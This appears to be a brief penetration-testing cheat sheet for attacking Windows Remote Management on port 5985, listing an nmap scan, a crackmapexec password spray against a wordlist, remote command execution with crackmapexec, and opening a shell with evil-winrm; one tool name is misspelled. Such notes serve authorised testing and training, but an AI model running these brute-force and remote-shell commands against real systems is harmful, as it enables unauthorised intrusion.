nmap -sV -sC -Pn -p 5985 $IP -oN recon/winrm
# crackmapexec
crackpmapexec winrm $IP -u $username -p /path/to/wordlists
# crackmapexec
crackmapexec winrm $IP -u $username -p $password -x "whoami"
# evil-winrm (get a shell session)
evil-winrm -u $username -p $password -i $IP